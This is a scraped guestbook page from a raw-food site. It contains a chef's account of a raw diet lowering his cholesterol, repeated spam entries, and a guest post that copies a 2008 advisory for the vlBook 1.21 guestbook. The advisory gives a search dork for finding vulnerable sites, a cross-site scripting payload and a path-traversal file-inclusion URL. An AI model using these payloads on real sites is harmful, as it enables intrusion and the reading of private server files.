'); } var pageAmount = 0; var totalImage = 0; var imagePage = 1; var totalPage = parseInt(totalImage / pageAmount) + ((totalImage % pageAmount) != 0 ? 1 : 0); function nextImagePage() { imagePage++; if (imagePage > totalPage) {imagePage = 1}; imageStart = pageAmount * (imagePage - 1); imageEnd = imageStart + pageAmount; if (imageEnd > (totalImage - 1)) (imageEnd = (totalImage - 1)); var i = imageStart; var imageContainer = document.getElementById("ChoiceImage"); for (var j = 0; j < imageContainer.childNodes.length; j++) { if (i > imageEnd) {continue; } var obj = imageContainer.childNodes[j]; if (obj.type == "radio") { if (i < 10) (i = "0" + i); obj.value = i; continue; } else if (obj.src != undefined && obj.src != "") { obj.src = "avatar/default/default" + i + ".gif"; i++; } } } function checkData() { if (document.getElementById("name").value == "" || document.getElementById("text").value == "" || document.getElementById("captcha").value == "") { alert("Required field(s) missing!"); return false; } else if (document.all.text.value.length > 2000) { alert("Message too long!"); return false; } return true; } function newCaptcha() { var now=new Date(); document.getElementById('image_captcha').src='include/php-captcha.image.php?'+now.getTime(); } -->
 
dfg
 
 

Raw Stories

My raw journey started over a year ago.

At the age of 33 I was tired of my doctor telling me that my cholesterol was too high.  I needed to take action.  I was vaguely familiar with raw foods and the health benefits derived from a raw diet based on my work as a chef at the time.  I decided to give the raw lifestyle a shot.  For three months, I ate raw until dinner.  That consisted primarily of organic fresh fruits and vegetables in their natural state.  Plus lots and lots of green juice.  Then for dinner I had a lightly cooked meal.  Low and behold at my next doctor's visit, my cholesterol went down over 110 points!

I was hooked on raw foods at that very moment.  This was all the convincing I needed.  I loved what I was eating and the health benefits of a raw diet are second to none in my opinion.  With my background as a chef, I decided to devote my culinary energies to creating the best raw food possible and to share it with people like you! 

If you have a raw story feel free to share.  I want to hear it!

-Lawrence

P.S. If you want to know what green juice is, email me.   

Go to page [1]
Guest Message

by MEFISTO

sign Posted: 2008-06-08 13:20:07 reply Reply

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO

by MEFISTO


    NiKiTa_: #####################################################################################
     #### vlBook 1.21 (ALL VERSION) ####
     #### Multiple Remote Vulnerabilities (LFI/XSS) ####
     #####################################################################################
     # #
     #AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani) #
     #Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani) #
     #Our Site : Http://IRCRASH.COM #
     #IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
     #####################################################################################
     # #
     #Script Download : http://home.vlab.info/vlbook_1.21.zip #
     # #
     #DORK : "Powered by vlBook 1.21" #
     # #
     #####################################################################################
     # < XSS > #
     #XSS Address : http://example/?l=" <script>alert('xss')</script> #
     # #
     #####################################################################################
     # < LFI > #
     #LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00 #
     # #
     #####################################################################################
     # Site : Http://IRCRASH.COM #
     ################################ TNX GOD ############################################
     
     # milw0rm.com [2008-05-01]

 
| Share your Raw Story |